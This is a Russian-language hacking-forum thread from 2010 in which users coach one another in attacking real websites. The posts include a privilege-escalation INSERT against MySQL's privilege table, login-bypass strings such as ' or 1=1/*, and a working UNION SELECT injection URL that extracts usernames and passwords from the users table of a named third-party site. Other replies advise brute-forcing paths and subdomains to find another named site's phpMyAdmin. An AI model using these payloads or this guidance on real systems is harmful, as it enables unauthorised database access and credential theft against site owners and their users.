 |
|
19.01.2010, 20:54
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от wkar
Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
Код:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе? Столько ошибок в одной строчке  не в обиду, но больше читай мануалы, это совет
user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос.
INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)
Последний раз редактировалось v1d0qz; 19.01.2010 в 21:06..
|
|
|
19.01.2010, 21:09
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
А каким еще способом можно увеличить привилегии юзера бд.
Система фрибсд 7.2.
|
|
|
|
20.01.2010, 13:00
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
Сообщение от mff
Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть Возможен auth bypass,не фильтруються переменные логина и пароля....
Я не смотрел,но может поможет в дальнейшем.
ЗЫ:login -
' or 1=1/*
admin'/*
Последний раз редактировалось S00pY; 20.01.2010 в 13:05..
|
|
|
|
20.01.2010, 16:12
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
С нами:
8629789
Репутация:
0
|
|
что за инъекция:...
http://www.aaadtc.com/page.php?content=buy&cnum=21
подставляя кавычку
http://www.aaadtc.com/page.php?content=buy&cnum=21'
вылетает ошибка
Fatal error: Call to a member function execute() on a non-object in /home/.rhino/lsdtc/mydtcbusiness.com/clientsites/bigdeli_nader/data/buy.php on line 92
После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=0+union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
что это такое? |
|
|
|
20.01.2010, 16:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
|
|
|
|
20.01.2010, 16:58
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от mff
Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
Брутить пути и субдомены =)
Если phpmyadmin там есть вообще...
billing.centre.ru это не пойдет?
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
20.01.2010, 19:08
|
|
Познающий
Регистрация: 26.12.2009
Сообщений: 66
С нами:
8618831
Репутация:
-25
|
|
Посмотри в (субдоменны ))
|
|
|
|
20.01.2010, 19:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
GinTonic,
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
|
|
|
|
20.01.2010, 20:33
|
|
Новичок
Регистрация: 18.12.2009
Сообщений: 13
С нами:
8629789
Репутация:
0
|
|
Сообщение от ElteRUS
GinTonic,
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+sel ect+1,2,password,4,5,6,7,8,9,10,11,username,13,14+ from+users--+
а почему ноль на двойку заменил?
и почему в 3 и 12?
Последний раз редактировалось GinTonic; 20.01.2010 в 20:39..
|
|
|
|
20.01.2010, 21:09
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от GinTonic
а почему ноль на двойку заменил?
и почему в 3 и 12?
смотри внимательней
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
